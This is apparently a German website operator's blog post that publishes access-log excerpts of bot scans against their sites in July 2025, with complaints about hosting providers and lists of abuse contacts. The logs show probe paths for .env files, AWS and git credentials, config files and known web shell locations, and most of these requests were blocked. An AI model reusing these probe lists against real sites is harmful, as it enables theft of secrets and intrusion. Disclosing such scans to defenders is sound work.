14.160.24.238 website*2.com – – [08/Jul/2025:03:03:34 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http:// website*2.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62“
ASN AS16276 – OVH SAS – SECOND ABUSE MAIL TODAY!
2001:41d0:401:3000::2309 website*2.com – – [08/Jul/2025:03:12:13 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*2.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62“
AS17054 – Expedient
216.37.42.34 website*1 – – [08/Jul/2025:03:31:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS7506 – GMO Internet Group, Inc.
2400:8500:1301:738:133:130:103:36 website*3.com – – [08/Jul/2025:03:33:50 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS37963 – Hangzhou Alibaba Advertising Co.,Ltd. – ALIBABA IS COMPLETE UNWANTED – COMPLETE BLOCKED!
59.110.47.144 website*1 – – [08/Jul/2025:03:37:07 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0“
—

dsltac2north.unoc@airtel.com, shankar.B@airtel.com, abuse@oracleemaildelivery.com, abuse@vultr.com,tlynch@vultr.com,abuse@timeweb.ru, abuse@ovh.net

ASN AS24560 – Bharti Airtel Ltd., Telemedia Services
122.180.244.216 website*1 – – [08/Jul/2025:02:10:14 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http:// website*1“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
AS31898 – Oracle Corporation
152.67.193.32 website*1 – – [08/Jul/2025:02:25:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
AS20473 – The Constant Company, LLC
2001:19f0:7402:5c2:5400:4ff:fe0b:48fc website*2.com – – [08/Jul/2025:02:36:23 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*2.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
AS210976 – Timeweb, LLP – RUSSIA IS COMPLETE BLOCKED – COMPLETE UNWANTED!
147.45.136.104 website*1 – – [08/Jul/2025:02:46:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http:// website*1“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“
ASN AS16276 – OVH SAS
2402:1f00:8000:800::1c87 website*2.com – – [08/Jul/2025:02:47:25 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

Soviel für heute, den 08.07.25! 😉

Protokoll-Auszüge vom 03/06 Juli 2025 – Was war so los, über das Wochenende?

Zuerst einmal ein Hacker-Idiot über den Provider AS401120 – cheapy.host LLC , Abuse-Mails an abuse@cheapy.host ohne jegliche Reaktion. Naja, das kennen wir ja schon, es sind immer die gleichen Provider, die hier anscheinend NUR DURCH IGNORANZ und ARROGANZ glänzen:

196.251.84.49 website*1.com – – [03/Jul/2025:13:18:49 +0200] „POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.84.49 website*1.com – – [03/Jul/2025:13:18:49 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.84.49 website*1.com – – [03/Jul/2025:13:18:49 +0200] „POST /wp-plain.php HTTP/1.0“ 302 – „www.google.com“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.84.49 website*1.com – – [03/Jul/2025:13:18:49 +0200] „POST /alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.84.49 website*1.com – – [03/Jul/2025:13:18:49 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.84.49 website*1.com – – [03/Jul/2025:13:18:49 +0200] „GET /wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36“
196.251.84.49 website*1.com – – [03/Jul/2025:13:18:49 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
+
196.251.85.93 website*1.com – – [04/Jul/2025:02:32:33 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.85.93 website*1.com – – [04/Jul/2025:02:32:54 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
+
196.251.85.48 website*2.com – – [05/Jul/2025:17:17:18 +0200] „GET //wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36“
+
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:22 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:22 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:23 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:23 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:23 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:23 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:23 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:23 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:23 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:23 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:23 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:23 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:23 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:23 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:24 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:24 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:24 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.83.252 website*3.com – – [06/Jul/2025:07:56:24 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“

The next one!

Auch hier erfolgen an den mit verantwortlichen Provider AS211590 – Bucklog SARL keinerlei Reaktionen gzgl. Abuse-Mails an bucklog@proton.me!

Diese Art von Verantwortungslosigkeit ist ein absolutes NoGo!!!

185.177.72.107 website*2.com – – [05/Jul/2025:16:55:19 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „-“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:19 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:19 +0200] „GET /.env.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:19 +0200] „GET /.env.dev HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:20 +0200] „GET /.env.development HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:20 +0200] „GET /.env.prod HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:20 +0200] „GET /.env.production HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:20 +0200] „GET /.env.stage HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:20 +0200] „GET /.env.test HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:20 +0200] „GET /.env.example HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:20 +0200] „GET /.env.bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:20 +0200] „GET /.env.old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:20 +0200] „GET /config/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:20 +0200] „GET /config/config.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:21 +0200] „GET /app/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:21 +0200] „GET /admin/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:21 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:21 +0200] „GET /apps/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:21 +0200] „GET /server/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:21 +0200] „GET /backend/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:21 +0200] „GET /aws/credentials HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:22 +0200] „GET /.aws/credentials HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:22 +0200] „GET /.aws/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:22 +0200] „GET /config/aws.yml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:22 +0200] „GET /config/aws.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:22 +0200] „GET /docker-compose.yml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:22 +0200] „GET /docker-compose.override.yml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:22 +0200] „GET /docker-compose.prod.yml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:22 +0200] „GET /docker-compose.dev.yml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:22 +0200] „GET /config/config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:22 +0200] „GET /config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:23 +0200] „GET /config.yaml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:23 +0200] „GET /config.yml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:23 +0200] „GET /secrets.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:23 +0200] „GET /secrets.yml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:23 +0200] „GET /credentials.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:23 +0200] „GET /.git-credentials HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.107 website*2.com – – [05/Jul/2025:16:55:23 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
und etc… und etc…
+
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /test/info.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /admin/info.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /info HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /config/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /test/phpinfo.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /settings.properties HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /phpinfo.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /info.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /admin/phpinfo.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /php.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /phpinfo/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /debug.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.22 website*2.com – – [06/Jul/2025:05:49:40 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“

Protokoll-Auszüge vom 03/04 Juli 2025 – Täglich Grüßen gewisse IDIOTEN, die bekannte Provider missbrauchen!

Abuse- Meldungen gingen schon gestern an AS396982 – Google LLC!

Das Ergebnis danach war, dass diese Bot/Scannings und/oder Hacking-Versuche immens zunahmen!

Alleine das ist schon sehr fragwürdig, denn von einem verantwortungsvollen Provider erwarten man, DASS DAS AUFHÖRT!

Da durch unsere Abuse-Meldungen von gestern eben das Gegenteil erreicht wurde, wird das nun hier veröffentlicht!

Zum Schutz des Website-Besitzers haben wir HIER die betroffene Domain in website*1 umbenannt.

JETZT HAT AS396982 – Google LLC DAFÜR ZU SORGEN, DASS DAS SOFORT AUFHÖRT!!!

Folgende Bot / Scannings und/oder Hacking-Versuche gab es:

34.162.249.193 website*1.com – – [03/Jul/2025:17:37:53 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.249.193 website*1.com – – [03/Jul/2025:17:37:54 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.213.98 website*1.com – – [03/Jul/2025:17:57:12 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.213.98 website*1.com – – [03/Jul/2025:17:57:12 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.165.185 website*1.com – – [03/Jul/2025:19:41:57 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.165.185 website*1.com – – [03/Jul/2025:19:41:57 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.165.185 website*1.com – – [03/Jul/2025:19:41:57 +0200] „GET /.git/config HTTP/1.0“ 403 – „https://www. website*1.com/.git/config“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
